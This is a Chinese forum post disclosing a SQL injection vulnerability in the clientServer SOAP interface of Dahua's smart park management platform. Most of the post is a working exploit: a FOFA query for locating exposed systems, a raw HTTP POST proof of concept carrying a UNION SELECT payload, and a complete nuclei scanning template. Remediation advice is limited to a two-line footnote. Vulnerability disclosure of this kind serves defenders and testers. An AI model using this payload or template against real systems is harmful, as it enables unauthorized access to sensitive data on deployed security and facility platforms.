大华智慧园区综合管理平台clientServer存在SQL注入漏洞

我是大白   ·   发表于 2024-03-14 19:48:29   ·   漏洞文章

大华智慧园区综合管理平台clientServer存在SQL注入漏洞

漏洞描述

大华智慧园区综合管理平台clientServer接口处未对用户的输入进行过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。未授权攻击者可利用此漏洞获取敏感信息。

产品界面

fofa语法

app="dahua-智慧园区综合管理平台"

POC

  1. POST /portal/services/clientServer HTTP/1.1
  2. Host:
  3. User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  4. Content-Type: text/xml;charset=UTF-8
  5. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
  6. <soapenv:Header/>
  7. <soapenv:Body>
  8. <cli:getGroupInfoListByGroupId>
  9. <!--type: string-->
  10. <arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,md5(123456)-- -</arg0>
  11. <!--type: long-->
  12. <arg1>10</arg1>
  13. </cli:getGroupInfoListByGroupId>
  14. </soapenv:Body>
  15. </soapenv:Envelope>

nuclei验证

  1. id: dahua-WPMS-clientServer-sql
  2. info:
  3. name: 大华智慧园区综合管理平台clientServer存在SQL注入漏洞
  4. author: nobody
  5. severity: high
  6. description: |
  7. 大华智慧园区综合管理平台clientServer接口处未对用户的输入进行过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。未授权攻击者可利用此漏洞获取敏感信息。
  8. impact: |
  9. 未授权攻击者可利用此漏洞获取敏感信息。
  10. remediation: |
  11. 升级版本,打补丁
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: app="dahua-智慧园区综合管理平台"
  16. tags: dahua,sql
  17. requests:
  18. - raw:
  19. - |
  20. POST /portal/services/clientServer HTTP/1.1
  21. Host: {{Hostname}}
  22. User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  23. Content-Type: text/xml;charset=UTF-8
  24. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
  25. <soapenv:Header/>
  26. <soapenv:Body>
  27. <cli:getGroupInfoListByGroupId>
  28. <!--type: string-->
  29. <arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,md5(123456)-- -</arg0>
  30. <!--type: long-->
  31. <arg1>10</arg1>
  32. </cli:getGroupInfoListByGroupId>
  33. </soapenv:Body>
  34. </soapenv:Envelope>
  35. matchers:
  36. - type: dsl
  37. dsl:
  38. - status_code == 200 && contains_all(body,"e10adc3949ba59abbe56e057f20f883e")

修复建议

  • 建议升级到最新版本或打补丁
  • 输入做严格过滤

打赏我,让我更有动力~

0 条回复   |  直到 1个月前 | 146 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.